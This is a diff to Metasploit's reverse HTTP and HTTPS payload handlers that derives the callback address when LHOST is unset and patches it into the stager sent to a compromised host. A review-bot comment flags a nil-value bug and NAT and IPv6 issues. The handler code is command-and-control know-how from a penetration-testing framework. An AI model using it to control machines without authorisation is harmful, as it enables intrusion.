diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 9f3c35db1e..0f099174e9 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -123,13 +123,21 @@ protected
 print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
+
+ lhost = datastore['LHOST']
+
+ # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
+ if lhost.empty? or lhost == '0.0.0.0'
+ lhost = Rex::Socket.source_address(cli.peerhost)
+ end
+
 # Process the requested resource.
 case req.relative_resource
 when /^\/INITJM/
- print_line("java: #{req.relative_resource}")
+ print_line("Java: #{req.relative_resource}")
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
- url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 print_line "URL: #{url.inspect}"
 blob = ""
@@ -178,7 +186,7 @@ protected
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
 i = blob.index("https://" + ("X" * 256))
 if i
- url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 blob[i, url.length] = url
 end
 print_status("Patched URL at offset #{i}...")
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index 605eb759d5..4bf1f20d6d 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
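Review bot: In reverse_http.rb's first hunk, `lhost.empty?` will raise NoMethodError when LHOST is unset, because `datastore['LHOST']` can be nil; coerce first with `lhost = datastore['LHOST'].to_s` and prefer `||` to `or` in the condition (the reverse_https.rb hunk carries the identical block and needs the same change, so a shared helper would keep the two in step). `Rex::Socket.source_address(cli.peerhost)` picks the local interface address routed toward the peer, which behind NAT or port forwarding is not an address the client can reach, so the comment should say so: `# NOTE: behind NAT this is the private interface address; set LHOST explicitly`. If the peer is IPv6 the derived address is presumably a bare IPv6 literal, which the interpolation on the `url =` lines does not bracket, so the resulting URL would be malformed. The enclosing method starts before and ends after this hunk.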
@@ -124,11 +124,18 @@ protected
 print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
+ lhost = datastore['LHOST']
+
+ # Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
+ if lhost.empty? or lhost == '0.0.0.0'
+ lhost = Rex::Socket.source_address(cli.peerhost)
+ end
+
 # Process the requested resource.
 case req.relative_resource
 when /^\/INITJM/
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
- url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 #$stdout.puts "URL: #{url.inspect}"
 blob = ""
@@ -176,7 +183,7 @@ protected
 conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
 i = blob.index("https://" + ("X" * 256))
 if i
- url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+ url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 blob[i, url.length] = url
 end
 print_status("Patched URL at offset #{i}...")